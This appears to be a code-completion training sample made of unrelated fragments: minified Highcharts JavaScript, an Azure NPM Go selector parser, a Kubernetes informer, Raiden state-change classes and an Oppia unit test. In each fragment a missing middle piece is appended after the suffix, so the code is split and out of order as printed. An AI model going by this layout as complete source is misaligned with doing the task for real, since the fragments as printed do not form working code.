a&&n.states&&n.states[a]&&!1===n.states[a].enabled)){if(this.graphic)g=g&&this.graphic.symbolName&&r.r,this.graphic.attr(E(r,g?{x:c-g,y:d-g,width:2*g,height:2*g}:{})),m&&m.hide();else{if(a&&k)if(g=k.radius,n=n.symbol||e.symbol,m&&m.currentSymbol!==n&&(m=m.destroy()),m)m[b?"animate":"attr"]({x:c-g,y:d-g});else n&&(e.stateMarkerGraphic=m=q.renderer.symbol(n,c-g,d-g,2*g,2*g).attr(r).add(e.markerGroup),m.currentSymbol=n);if(m)m[a&&q.isInsidePlot(c,d,q.inverted)?"show":"hide"]()}(c=f[a]&&f[a].halo)&&c.size?
(p||(e.halo=p=q.renderer.path().add(e.seriesGroup)),p.attr(t({fill:Aa(this.color||e.color).setOpacity(c.opacity).get()},c.attributes))[b?"animate":"attr"]({d:this.haloPath(c.size)})):p&&p.attr({d:[]});this.state=a}},haloPath:function(a){var b=this.series,c=b.chart,d=b.getPlotBox(),e=c.inverted;return c.renderer.symbols.circle(d.translateX+(e?b.yAxis.len-this.plotY:this.plotX)-a,d.translateY+(e?b.xAxis.len-this.plotX:this.plotY)-a,2*a,2*a)}});t(ga.prototype,{onMouseOver:function(){var a=this.chart,
b=a.hoverSeries;if(b&&b!==this)b.onMouseOut();this.options.events.mouseOver&&C(this,"mouseOver");this.setState("hover");a.hoverSeries=this},onMouseOut:function(){var a=this.options,b=this.chart,c=b.tooltip,d=b.hoverPoint;if(d)d.onMouseOut();this&&a.events.mouseOut&&C(this,"mouseOut");!c||a.stickyTracking||c.shared&&!this.noSharedTooltip||c.hide();this.setState();b.hoverSeries=null},setState:function(a){var b=this.options,c=this.graph,d=this.graphNeg,e=b.states,b=b.lineWidth;a=a||"";this.state!==a&&
(this.state=a,e[a]&&!1===e[a].enabled||(a&&(b=e[a].lineWidth||b+1),c&&!c.dashstyle&&(a={"stroke-width":b},c.attr(a),d&&d.attr(a))))},setVisible:function(a,b){var c=this,d=c.chart,e=c.legendItem,f,g=d.options.chart.ignoreHiddenSeries,h=c.visible;f=(c.visible=a=c.userOptions.visible=a===v?!h:a)?"show":"hide";s(["group","dataLabelsGroup","markerGroup","tracker"],function(a){if(c[a])c[a][f]()});if(d.hoverSeries===c)c.onMouseOut();e&&d.legend.colorizeItem(c,a);c.isDirty=!0;c.options.stacking&&s(d.series,
function(a){a.options.stacking&&a.visible&&(a.isDirty=!0)});s(c.linkedSeries,function(b){b.setVisible(a,!1)});g&&(d.isDirtyBox=!0);!1!==b&&d.redraw();C(c,f)},setTooltipPoints:function(a){var b=[],c,d,e=this.xAxis,f=e&&e.getExtremes(),g=e?e.tooltipLen||e.len:this.chart.plotSizeX,h,k,l=[];if(!1!==this.options.enableMouseTracking&&!this.singularTooltips){a&&(this.tooltipPoints=null);s(this.segments||this.points,function(a){b=b.concat(a)});e&&e.reversed&&(b=b.reverse());this.orderTooltipPoints&&this.orderTooltipPoints(b);
a=b.length;for(k=0;k<a;k++)if(e=b[k],c=e.x,c>=f.min&&c<=f.max)for(h=b[k+1],c=d===v?0:d+1,d=b[k+1]?J(x(0,F((e.clientX+(h?h.wrappedClientX||h.clientX:g))/2)),g):g;0<=c&&c<=d;)l[c++]=e;this.tooltipPoints=l}},show:function(){this.setVisible(!0)},hide:function(){this.setVisible(!1)},select:function(a){this.selected=a=a===v?!this.selected:a;this.checkbox&&(this.checkbox.checked=a);C(this,a?"select":"unselect")},drawTracker:ab.drawTrackerGraph});t(S,{Axis:sa,Chart:Qa,Color:Aa,Point:Ja,Tick:xa,Renderer:Ta,
Series:ga,SVGElement:W,SVGRenderer:Za,arrayMin:va,arrayMax:la,charts:Y,dateFormat:Ka,format:ua,pathAnim:lb,getOptions:function(){return I},hasBidiBug:Kb,isTouchDevice:Cb,numberFormat:qa,seriesTypes:M,setOptions:function(a){I=E(!0,I,a);ub();return I},addEvent:N,removeEvent:T,createElement:ta,discardElement:La,css:X,each:s,extend:t,map:Xa,merge:E,pick:r,splat:ha,extendClass:bb,pInt:A,wrap:cb,svg:ba,canvas:da,vml:!ba&&!da,product:"@product.name@",version:"@product.version@"})})();
(function(t){function E(){return!!this.points.length}function A(){this.hasData()?this.hideNoData():this.showNoData()}var U=t.seriesTypes,V=t.Chart.prototype,ka=t.getOptions(),$=t.extend;$(ka.lang,{noData:"No data to display"});ka.noData={position:{x:0,y:0,align:"center",verticalAlign:"middle"},attr:{},style:{fontWeight:"bold",fontSize:"12px",color:"#60606a"}};U.pie&&(U.pie.prototype.hasData=E);U.gauge&&(U.gauge.prototype.hasData=E);U.waterfall&&(U.waterfall.prototype.hasData=E);t.Series.prototype.hasData=
function(){return void 0!==this.dataMax&&void 0!==this.dataMin};V.showNoData=function(t){var A=this.options;t=t||A.lang.noData;A=A.noData;this.noDataLabel||(this.noDataLabel=this.renderer.label(t,0,0,null,null,null,null,null,"no-data").attr(A.attr).css(A.style).add(),this.noDataLabel.align($(this.noDataLabel.getBBox(),A.position),!1,"plotBox"))};V.hideNoData=function(){this.noDataLabel&&(this.noDataLabel=this.noDataLabel.destroy())};V.hasData=function(){for(var t=this.series,A=t.length;A--;)if(t[A].hasData()&&
!t[A].options.isInternal)return!0;return!1};V.callbacks.push(function(E){t.addEvent(E,"load",A);t.addEvent(E,"redraw",A)})})(Highcharts);
|
shortMonths:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),weekdays:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),decimalPoint:".",numericSymbols:"kMGTPE".split(""),resetZoom:"Reset zoom",resetZoomTitle:"Reset zoom level 1:1",thousandsSep:","},global:{useUTC:!0,canvasToolsURL:"http://[email protected]@/@product.version@/modules/canvas-tools.js",VMLRadialGradientURL:"http://[email protected]@/@product.version@/gfx/vml-radial-gradient.png"},
chart:{borderColor:"#4572A7",borderRadius:0,defaultSeriesType:"line",ignoreHiddenSeries:!0,spacing:[10,10,15,10],backgroundColor:"#FFFFFF",plotBorderColor:"#C0C0C0",resetZoomButton:{theme:{zIndex:20},position:{align:"right",x:-10,y:10}}},title:{text:"Chart title",align:"center",margin:15,style:{color:"#333333",fontSize:"18px"}},subtitle:{text:"",align:"center",style:{color:"#555555"}},plotOptions:{line:{allowPointSelect:!1,showCheckbox:!1,animation:{duration:1E3},events:{},lineWidth:2,marker:{lineWidth:0,
radius:4,lineColor:"#FFFFFF",states:{hover:{enabled:!0},select:{fillColor:"#FFFFFF",lineColor:"#000000",lineWidth:2}}},point:{events:{}},dataLabels:E(nb,{align:"center",enabled:!1,formatter:function(){return null===this.y?"":qa(this.y,-1)},verticalAlign:"bottom",y:0}),cropThreshold:300,pointRange:0,states:{hover:{marker:{},halo:{size:10,opacity:0.25}},select:{marker:{}}},stickyTracking:!0,turboThreshold:1E3}},labels:{style:{position:"absolute",color:"#3E576F"}},legend:{enabled:!0,align:"center",layout:"horizontal",
labelFormatter:function(){return this.name},borderColor:"#909090",borderRadius:0,navigation:{activeColor:"#274b6d",inactiveColor:"#CCC"},shadow:!1,itemStyle:{color:"#333333",fontSize:"12px",fontWeight:"bold"},itemHoverStyle:{color:"#000"},itemHiddenStyle:{color:"#CCC"},itemCheckboxStyle:{position:"absolute",width:"13px",height:"13px"},symbolPadding:5,verticalAlign:"bottom",x:0,y:0,title:{style:{fontWeight:"bold"}}},loading:{labelStyle:{fontWeight:"bold",position:"relative",top:"1em"},style:{position:"absolute",
|
parseSelector.go
|
package npm
import (
"fmt"
"sort"
"container/heap"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"github.com/Azure/azure-container-networking/log"
"github.com/Azure/azure-container-networking/npm/util"
)
// An ReqHeap is a min-heap of labelSelectorRequirements.
type ReqHeap []metav1.LabelSelectorRequirement
func (h ReqHeap) Len() int {
return len(h)
}
func (h ReqHeap) Less(i, j int) bool {
sort.Strings(h[i].Values)
sort.Strings(h[j].Values)
if int(h[i].Key[0]) < int(h[j].Key[0]) {
return true
}
if int(h[i].Key[0]) > int(h[j].Key[0]) {
return false
}
if len(h[i].Values) == 0 {
return true
}
if len(h[j].Values) == 0 {
return false
}
if len(h[i].Values[0]) == 0 {
return true
}
if len(h[j].Values[0]) == 0 {
return false
}
return int(h[i].Values[0][0]) < int(h[j].Values[0][0])
}
func (h ReqHeap) Swap(i, j int) {
h[i], h[j] = h[j], h[i]
}
func (h *ReqHeap) Push(x interface{}) {
sort.Strings(x.(metav1.LabelSelectorRequirement).Values)
*h = append(*h, x.(metav1.LabelSelectorRequirement))
}
func (h *ReqHeap) Pop() interface{} {
old := *h
n := len(old)
x := old[n -1]
*h = old[0 : n - 1]
return x
}
// ParseLabel takes a Azure-NPM processed label then returns if it's referring to complement set,
// and if so, returns the original set as well.
func ParseLabel(label string) (string, bool) {
//The input label is guaranteed to have a non-zero length validated by k8s.
//For label definition, see below parseSelector() function.
if label[0:1] == util.IptablesNotFlag {
return label[1:], true
}
return label, false
}
// GetOperatorAndLabel returns the operator associated with the label and the label without operator.
func GetOperatorAndLabel(label string) (string, string) {
if len(label) == 0 {
return "", ""
}
if string(label[0]) == util.IptablesNotFlag {
return util.IptablesNotFlag, label[1:]
}
return "", label
}
// GetOperatorsAndLabels returns the operators along with the associated labels.
func GetOperatorsAndLabels(labelsWithOps []string) ([]string, []string) {
var ops, labelsWithoutOps []string
for _, labelWithOp := range labelsWithOps {
op, labelWithoutOp := GetOperatorAndLabel(labelWithOp)
ops = append(ops, op)
labelsWithoutOps = append(labelsWithoutOps, labelWithoutOp)
}
return ops, labelsWithoutOps
}
// sortSelector sorts the member fields of the selector in an alphebatical order.
func sortSelector(selector *metav1.LabelSelector) {
_, _ = util.SortMap(&selector.MatchLabels)
reqHeap := &ReqHeap{}
heap.Init(reqHeap)
for _, req := range selector.MatchExpressions {
heap.Push(reqHeap, req)
}
var sortedReqs []metav1.LabelSelectorRequirement
for reqHeap.Len() > 0 {
sortedReqs = append(sortedReqs, heap.Pop(reqHeap).(metav1.LabelSelectorRequirement))
}
selector.MatchExpressions = sortedReqs
}
// HashSelector returns the hash value of the selector.
func HashSelector(selector *metav1.LabelSelector) string {
sortSelector(selector)
return util.Hash(fmt.Sprintf("%v", selector))
}
// parseSelector takes a LabelSelector and returns a slice of processed labels, keys and values.
func parseSelector(selector *metav1.LabelSelector) ([]string, []string, []string)
|
{
var (
labels []string
keys []string
vals []string
)
if selector == nil {
return labels, keys, vals
}
if len(selector.MatchLabels) == 0 && len(selector.MatchExpressions) == 0 {
labels = append(labels, "")
keys = append(keys, "")
vals = append(vals, "")
return labels, keys, vals
}
sortedKeys, sortedVals := util.SortMap(&selector.MatchLabels)
for i := range sortedKeys {
labels = append(labels, sortedKeys[i]+":"+sortedVals[i])
}
keys = append(keys, sortedKeys...)
vals = append(vals, sortedVals...)
for _, req := range selector.MatchExpressions {
var k string
switch op := req.Operator; op {
case metav1.LabelSelectorOpIn:
for _, v := range req.Values {
k = req.Key
keys = append(keys, k)
vals = append(vals, v)
labels = append(labels, k+":"+v)
}
case metav1.LabelSelectorOpNotIn:
for _, v := range req.Values {
k = util.IptablesNotFlag + req.Key
keys = append(keys, k)
vals = append(vals, v)
labels = append(labels, k+":"+v)
}
// Exists matches pods with req.Key as key
case metav1.LabelSelectorOpExists:
k = req.Key
keys = append(keys, req.Key)
vals = append(vals, "")
labels = append(labels, k)
// DoesNotExist matches pods without req.Key as key
case metav1.LabelSelectorOpDoesNotExist:
k = util.IptablesNotFlag + req.Key
keys = append(keys, k)
vals = append(vals, "")
labels = append(labels, k)
default:
log.Errorf("Invalid operator [%s] for selector [%v] requirement", op, *selector)
}
}
return labels, keys, vals
}
|
|
machine.go
|
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by informer-gen. DO NOT EDIT.
package v1
import (
"context"
time "time"
crdv1 "github.com/kangxiaoning/learn-kubernetes-crd/pkg/apis/crd/v1"
versioned "github.com/kangxiaoning/learn-kubernetes-crd/pkg/client/clientset/versioned"
internalinterfaces "github.com/kangxiaoning/learn-kubernetes-crd/pkg/client/informers/externalversions/internalinterfaces"
v1 "github.com/kangxiaoning/learn-kubernetes-crd/pkg/client/listers/crd/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
runtime "k8s.io/apimachinery/pkg/runtime"
watch "k8s.io/apimachinery/pkg/watch"
cache "k8s.io/client-go/tools/cache"
)
// MachineInformer provides access to a shared informer and lister for
// Machines.
type MachineInformer interface {
Informer() cache.SharedIndexInformer
Lister() v1.MachineLister
}
type machineInformer struct {
factory internalinterfaces.SharedInformerFactory
tweakListOptions internalinterfaces.TweakListOptionsFunc
namespace string
}
// NewMachineInformer constructs a new informer for Machine type.
// Always prefer using an informer factory to get a shared informer instead of getting an independent
// one. This reduces memory footprint and number of connections to the server.
func NewMachineInformer(client versioned.Interface, namespace string, resyncPeriod time.Duration, indexers cache.Indexers) cache.SharedIndexInformer {
return NewFilteredMachineInformer(client, namespace, resyncPeriod, indexers, nil)
}
// NewFilteredMachineInformer constructs a new informer for Machine type.
// Always prefer using an informer factory to get a shared informer instead of getting an independent
// one. This reduces memory footprint and number of connections to the server.
func
|
(client versioned.Interface, namespace string, resyncPeriod time.Duration, indexers cache.Indexers, tweakListOptions internalinterfaces.TweakListOptionsFunc) cache.SharedIndexInformer {
return cache.NewSharedIndexInformer(
&cache.ListWatch{
ListFunc: func(options metav1.ListOptions) (runtime.Object, error) {
if tweakListOptions != nil {
tweakListOptions(&options)
}
return client.CrdV1().Machines(namespace).List(context.TODO(), options)
},
WatchFunc: func(options metav1.ListOptions) (watch.Interface, error) {
if tweakListOptions != nil {
tweakListOptions(&options)
}
return client.CrdV1().Machines(namespace).Watch(context.TODO(), options)
},
},
&crdv1.Machine{},
resyncPeriod,
indexers,
)
}
func (f *machineInformer) defaultInformer(client versioned.Interface, resyncPeriod time.Duration) cache.SharedIndexInformer {
return NewFilteredMachineInformer(client, f.namespace, resyncPeriod, cache.Indexers{cache.NamespaceIndex: cache.MetaNamespaceIndexFunc}, f.tweakListOptions)
}
func (f *machineInformer) Informer() cache.SharedIndexInformer {
return f.factory.InformerFor(&crdv1.Machine{}, f.defaultInformer)
}
func (f *machineInformer) Lister() v1.MachineLister {
return v1.NewMachineLister(f.Informer().GetIndexer())
}
|
NewFilteredMachineInformer
|
state_change.py
|
# -*- coding: utf-8 -*-
# pylint: disable=too-few-public-methods,too-many-arguments,too-many-instance-attributes
from raiden.transfer.architecture import StateChange
from raiden.transfer.state import RouteState
from raiden.transfer.mediated_transfer.state import (
LockedTransferSignedState,
TransferDescriptionWithSecretState,
)
from raiden.utils import pex, sha3, typing
# Note: The init states must contain all the required data for trying doing
# useful work, ie. there must /not/ be an event for requesting new data.
class ActionInitInitiator(StateChange):
""" Initial state of a new mediated transfer.
Args:
transfer: A state object containing the transfer details.
routes: A list of possible routes provided by a routing service.
secret: The secret that must be used with the transfer.
"""
def __init__(self, payment_network_identifier, transfer_description, routes):
if not isinstance(transfer_description, TransferDescriptionWithSecretState):
raise ValueError('transfer must be an TransferDescriptionWithSecretState instance.')
self.payment_network_identifier = payment_network_identifier
self.transfer = transfer_description
self.routes = routes
def __repr__(self):
return '<ActionInitInitiator network:{} transfer:{}>'.format(
self.payment_network_identifier,
self.transfer,
)
def __eq__(self, other):
return (
isinstance(other, ActionInitInitiator) and
self.payment_network_identifier == other.payment_network_identifier and
self.transfer == other.transfer and
self.routes == other.routes
)
def __ne__(self, other):
return not self.__eq__(other)
class ActionInitMediator(StateChange):
""" Initial state for a new mediator.
Args:
routes: A list of possible routes provided by a routing service.
from_route: The payee route.
from_transfer: The payee transfer.
"""
def __init__(
self,
payment_network_identifier,
routes: typing.List[RouteState],
from_route: RouteState,
from_transfer: LockedTransferSignedState):
if not isinstance(from_route, RouteState):
raise ValueError('from_route must be a RouteState instance')
if not isinstance(from_transfer, LockedTransferSignedState):
raise ValueError('from_transfer must be a LockedTransferSignedState instance')
self.payment_network_identifier = payment_network_identifier
self.routes = routes
self.from_route = from_route
self.from_transfer = from_transfer
def __repr__(self):
return '<ActionInitMediator network:{} from_route:{} from_transfer:{}>'.format(
self.payment_network_identifier,
self.from_route,
self.from_transfer,
)
def __eq__(self, other):
return (
isinstance(other, ActionInitMediator) and
self.payment_network_identifier == other.payment_network_identifier and
self.routes == other.routes and
self.from_route == other.from_route and
self.from_transfer == other.from_transfer
)
def __ne__(self, other):
return not self.__eq__(other)
class ActionInitTarget(StateChange):
""" Initial state for a new target.
Args:
route: The payee route.
transfer: The payee transfer.
"""
def __init__(self, payment_network_identifier, route, transfer):
if not isinstance(route, RouteState):
raise ValueError('route must be a RouteState instance')
if not isinstance(transfer, LockedTransferSignedState):
raise ValueError('transfer must be a LockedTransferSignedState instance')
self.payment_network_identifier = payment_network_identifier
self.route = route
self.transfer = transfer
def __repr__(self):
return '<ActionInitTarget network:{} route:{} transfer:{}>'.format(
self.payment_network_identifier,
self.route,
self.transfer,
)
def __eq__(self, other):
return (
isinstance(other, ActionInitTarget) and
self.payment_network_identifier == other.payment_network_identifier and
self.route == other.route and
self.transfer == other.transfer
)
def __ne__(self, other):
return not self.__eq__(other)
class ActionCancelRoute(StateChange):
""" Cancel the current route.
Notes:
Used to cancel a specific route but not the transfer. May be used for
timeouts.
"""
def __init__(self, identifier, routes):
self.identifier = identifier
self.routes = routes
def __repr__(self):
return '<ActionCancelRoute id:{}>'.format(
self.identifier,
)
def __eq__(self, other):
return (
isinstance(other, ActionCancelRoute) and
self.identifier == other.identifier and
self.routes == other.routes
)
def __ne__(self, other):
return not self.__eq__(other)
class ReceiveSecretRequest(StateChange):
""" A SecretRequest message received. """
def __init__(self, identifier, amount, hashlock, sender):
self.identifier = identifier
self.amount = amount
self.hashlock = hashlock
self.sender = sender
self.revealsecret = None
def __repr__(self):
return '<ReceiveSecretRequest id:{} amount:{} hashlock:{} sender:{}>'.format(
self.identifier,
self.amount,
pex(self.hashlock),
pex(self.sender),
)
def __eq__(self, other):
return (
isinstance(other, ReceiveSecretRequest) and
self.identifier == other.identifier and
self.amount == other.amount and
self.hashlock == other.hashlock and
self.sender == other.sender and
self.revealsecret == other.revealsecret
)
def __ne__(self, other):
return not self.__eq__(other)
class ReceiveSecretReveal(StateChange):
""" A SecretReveal message received. """
def __init__(self, secret, sender):
hashlock = sha3(secret)
self.secret = secret
self.hashlock = hashlock
self.sender = sender
def __repr__(self):
return '<ReceiveSecretReveal hashlock:{} sender:{}>'.format(
pex(self.hashlock),
pex(self.sender),
)
def __eq__(self, other):
return (
isinstance(other, ReceiveSecretReveal) and
self.secret == other.secret and
self.hashlock == other.hashlock and
self.sender == other.sender
)
def __ne__(self, other):
return not self.__eq__(other)
class ReceiveTransferRefundCancelRoute(StateChange):
""" A RefundTransfer message received by initiator will cancel the current
route.
"""
def __init__(self, sender, routes, transfer, secret):
if not isinstance(transfer, LockedTransferSignedState):
raise ValueError('transfer must be an instance of LockedTransferSignedState')
hashlock = sha3(secret)
self.sender = sender
self.transfer = transfer
self.routes = routes
self.hashlock = hashlock
self.secret = secret
def __repr__(self):
return '<ReceiveTransferRefundCancelRoute sender:{} transfer:{}>'.format(
pex(self.sender),
self.transfer
)
def __eq__(self, other):
return (
isinstance(other, ReceiveTransferRefundCancelRoute) and
self.sender == other.sender and
self.transfer == other.transfer and
self.routes == other.routes and
self.secret == other.secret and
self.hashlock == other.hashlock
)
def __ne__(self, other):
return not self.__eq__(other)
class ReceiveTransferRefund(StateChange):
""" A RefundTransfer message received. """
def __init__(self, sender, transfer: LockedTransferSignedState):
if not isinstance(transfer, LockedTransferSignedState):
raise ValueError('transfer must be an instance of LockedTransferSignedState')
self.sender = sender
self.transfer = transfer
def __repr__(self):
return '<ReceiveTransferRefund sender:{} transfer:{}>'.format(
pex(self.sender),
self.transfer,
)
def __eq__(self, other):
return (
isinstance(other, ReceiveTransferRefund) and
self.sender == other.sender and
self.transfer == other.transfer
)
def __ne__(self, other):
return not self.__eq__(other)
class ReceiveBalanceProof(StateChange):
""" A balance proof `identifier` was received. """
def __init__(self, identifier, node_address, balance_proof):
self.identifier = identifier
self.node_address = node_address
self.balance_proof = balance_proof
def __repr__(self):
return '<ReceiveBalanceProof id:{} node:{} balance_proof:{}>'.format(
self.identifier,
pex(self.node_address),
self.balance_proof,
)
def __eq__(self, other):
return (
isinstance(other, ReceiveBalanceProof) and
self.identifier == other.identifier and
self.node_address == other.node_address and
self.balance_proof == other.balance_proof
)
def __ne__(self, other):
return not self.__eq__(other)
class ContractReceiveWithdraw(StateChange):
""" A lock was withdrawn via the blockchain.
Used when a hash time lock was withdrawn and a log ChannelSecretRevealed is
emited by the netting channel.
Note:
For this state change the contract caller is not important but only the
receiving address. `receiver` is the address to which the lock's token
was transferred, this may be either of the channel participants.
If the channel was used for a mediated transfer that was refunded, this
event must be used twice, once for each receiver.
"""
def __init__(self, channel_address, secret, receiver):
hashlock = sha3(secret)
self.channel_address = channel_address
self.hashlock = hashlock
self.receiver = receiver
self.secret = secret
def __repr__(self):
return '<ContractReceiveWithdraw channel:{} hashlock:{} receiver:{}>'.format(
pex(self.channel_address),
pex(self.hashlock),
pex(self.receiver),
)
def __eq__(self, other):
return (
isinstance(other, ContractReceiveWithdraw) and
self.channel_address == other.channel_address and
self.hashlock == other.hashlock and
self.receiver == other.receiver and
self.secret == other.secret
)
def __ne__(self, other):
return not self.__eq__(other)
class ContractReceiveClosed(StateChange):
def __init__(self, channel_address, closing_address, block_number):
self.channel_address = channel_address
self.closing_address = closing_address
self.block_number = block_number # TODO: rename to closed_block
def __repr__(self):
return '<ContractReceiveClosed channel:{} closing:{} block_number:{}>'.format(
pex(self.channel_address),
pex(self.closing_address),
self.block_number,
)
def __eq__(self, other):
return (
isinstance(other, ContractReceiveClosed) and
self.channel_address == other.channel_address and
self.closing_address == other.closing_address and
self.block_number == other.block_number
)
def __ne__(self, other):
return not self.__eq__(other)
class ContractReceiveSettled(StateChange):
def __init__(self, channel_address, block_number):
self.channel_address = channel_address
self.block_number = block_number # TODO: rename to settle_block_number
def
|
(self):
return '<ContractReceiveSettled channel:{} block_number:{}>'.format(
pex(self.channel_address),
self.block_number,
)
def __eq__(self, other):
return (
isinstance(other, ContractReceiveSettled) and
self.channel_address == other.channel_address and
self.block_number == other.block_number
)
def __ne__(self, other):
return not self.__eq__(other)
class ContractReceiveBalance(StateChange):
def __init__(
self,
channel_address,
token_address,
participant_address,
balance,
block_number):
self.channel_address = channel_address
self.token_address = token_address
self.participant_address = participant_address
self.balance = balance
self.block_number = block_number
def __repr__(self):
return (
'<ContractReceiveBalance'
' channel:{} token:{} participant:{} balance:{} block_number:{}'
'>'
).format(
pex(self.channel_address),
pex(self.token_address),
pex(self.participant_address),
self.balance,
self.block_number,
)
def __eq__(self, other):
return (
isinstance(other, ContractReceiveBalance) and
self.channel_address == other.channel_address and
self.token_address == other.token_address and
self.participant_address == other.participant_address and
self.block_number == other.block_number
)
def __ne__(self, other):
return not self.__eq__(other)
class ContractReceiveNewChannel(StateChange):
def __init__(
self,
manager_address,
channel_address,
participant1,
participant2,
settle_timeout):
self.manager_address = manager_address
self.channel_address = channel_address
self.participant1 = participant1
self.participant2 = participant2
self.settle_timeout = settle_timeout
def __repr__(self):
return (
'<ContractReceiveNewChannel'
' manager:{} channel:{} participant1:{} participant2:{} settle_timeout:{}'
'>'
).format(
pex(self.manager_address),
pex(self.channel_address),
pex(self.participant1),
pex(self.participant2),
self.settle_timeout
)
def __eq__(self, other):
return (
isinstance(other, ContractReceiveNewChannel) and
self.manager_address == other.manager_address and
self.channel_address == other.channel_address and
self.participant1 == other.participant1 and
self.participant2 == other.participant2 and
self.settle_timeout == other.settle_timeout
)
def __ne__(self, other):
return not self.__eq__(other)
class ContractReceiveTokenAdded(StateChange):
def __init__(self, registry_address, token_address, manager_address):
self.registry_address = registry_address
self.token_address = token_address
self.manager_address = manager_address
def __repr__(self):
return '<ContractReceiveTokenAdded registry:{} token:{} manager:{}>'.format(
pex(self.registry_address),
pex(self.token_address),
pex(self.manager_address),
)
def __eq__(self, other):
return (
isinstance(other, ContractReceiveTokenAdded) and
self.registry_address == other.registry_address and
self.token_address == other.token_address and
self.manager_address == other.manager_address
)
def __ne__(self, other):
return not self.__eq__(other)
|
__repr__
|
NeedsGuidingResponsesTaskObjectFactorySpec.ts
|
// Copyright 2020 The Oppia Authors. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS-IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/**
* @fileoverview Unit tests for the NeedsGuidingResponsesTask domain object.
*/
import { TestBed } from '@angular/core/testing';
import { NeedsGuidingResponsesTaskObjectFactory } from
'domain/improvements/NeedsGuidingResponsesTaskObjectFactory';
import { AnswerStats } from 'domain/exploration/AnswerStatsObjectFactory';
describe('Needs guiding responses task', function() {
let needsGuidingResponsesTaskObjectFactory:
NeedsGuidingResponsesTaskObjectFactory;
beforeEach(() => {
needsGuidingResponsesTaskObjectFactory = (
TestBed.get(NeedsGuidingResponsesTaskObjectFactory));
});
beforeEach(() => {
this.newTop10AnswerStats = (numUnaddressedAnswers: number) => {
const answerStats = [];
for (let i = 0; i < 10; ++i) {
const newAnswerStats = new AnswerStats(
`Answer #${i}`, `Answer #${i}`, (10 - i) * 100,
i >= numUnaddressedAnswers);
answerStats.push(newAnswerStats);
}
return answerStats;
};
});
it('should return new task if state answer needs a guiding response', () => {
const task = needsGuidingResponsesTaskObjectFactory.createFromAnswerStats(
'eid', 1, 'Introduction', this.newTop10AnswerStats(3));
expect(task.entityType).toEqual('exploration');
expect(task.entityId).toEqual('eid');
expect(task.entityVersion).toEqual(1);
expect(task.taskType).toEqual('needs_guiding_responses');
expect(task.targetType).toEqual('state');
expect(task.targetId).toEqual('Introduction');
expect(task.getIssueDescription()).toEqual(
'3 of the top 10 answers for this card did not have explicit feedback ' +
'from Oppia.');
expect(task.isOpen()).toBeTrue();
});
it('should return obsolete task if all answers are addressed', () => {
const task = needsGuidingResponsesTaskObjectFactory.createFromAnswerStats(
'eid', 1, 'Introduction', this.newTop10AnswerStats(0));
expect(task.entityType).toEqual('exploration');
expect(task.entityId).toEqual('eid');
expect(task.entityVersion).toEqual(1);
expect(task.taskType).toEqual('needs_guiding_responses');
expect(task.targetType).toEqual('state');
expect(task.targetId).toEqual('Introduction');
expect(task.getIssueDescription()).toBeNull();
expect(task.isObsolete()).toBeTrue();
});
it('should create from an NGR task backend dict', () => {
const task = needsGuidingResponsesTaskObjectFactory.createFromBackendDict({
entity_type: 'exploration',
entity_id: 'eid',
entity_version: 1,
task_type: 'needs_guiding_responses',
target_type: 'state',
target_id: 'Introduction',
issue_description: (
'3 of the top 10 answers for this card did not have explicit ' +
'feedback from Oppia.'),
status: 'open',
resolver_username: null,
resolver_profile_picture_data_url: null,
resolved_on_msecs: null,
});
expect(task.entityType).toEqual('exploration');
expect(task.entityId).toEqual('eid');
expect(task.entityVersion).toEqual(1);
expect(task.taskType).toEqual('needs_guiding_responses');
expect(task.targetType).toEqual('state');
expect(task.targetId).toEqual('Introduction');
expect(task.getIssueDescription()).toEqual(
'3 of the top 10 answers for this card did not have explicit feedback ' +
'from Oppia.');
expect(task.isOpen()).toBeTrue();
});
it('should throw when backend dict entity type is not exploration', () => {
expect(
() => needsGuidingResponsesTaskObjectFactory.createFromBackendDict({
entity_type: '???',
entity_id: 'eid',
entity_version: 1,
task_type: 'needs_guiding_responses',
target_type: 'state',
target_id: 'Introduction',
issue_description: (
'3 of the top 10 answers for this card did not have explicit ' +
'feedback from Oppia.'),
status: 'open',
resolver_username: null,
resolver_profile_picture_data_url: null,
resolved_on_msecs: null,
})
).toThrowError(
'backend dict has entity_type "???" but expected "exploration"');
});
it('should throw when backend dict task type is not NGR', () => {
expect(
() => needsGuidingResponsesTaskObjectFactory.createFromBackendDict({
entity_type: 'exploration',
entity_id: 'eid',
entity_version: 1,
task_type: '???',
target_type: 'state',
target_id: 'Introduction',
issue_description: (
'3 of the top 10 answers for this card did not have explicit ' +
'feedback from Oppia.'),
status: 'open',
resolver_username: null,
resolver_profile_picture_data_url: null,
resolved_on_msecs: null,
})
).toThrowError(
'backend dict has task_type "???" but expected "needs_guiding_responses"'
);
});
it('should throw when backend dict target type is not state', () => {
expect(
() => needsGuidingResponsesTaskObjectFactory.createFromBackendDict({
entity_type: 'exploration',
entity_id: 'eid',
entity_version: 1,
task_type: 'needs_guiding_responses',
target_type: '???',
target_id: 'Introduction',
issue_description: (
'3 of the top 10 answers for this card did not have explicit ' +
'feedback from Oppia.'),
status: 'open',
|
resolver_username: null,
resolver_profile_picture_data_url: null,
resolved_on_msecs: null,
})
).toThrowError('backend dict has target_type "???" but expected "state"');
});
it('should update status based on changes to exploration stats', () => {
const task = needsGuidingResponsesTaskObjectFactory.createFromAnswerStats(
'eid', 1, 'Introduction', this.newTop10AnswerStats(3));
expect(task.isOpen()).toBeTrue();
expect(task.isResolved()).toBeFalse();
task.refreshStatus(this.newTop10AnswerStats(0));
expect(task.isOpen()).toBeFalse();
expect(task.isResolved()).toBeTrue();
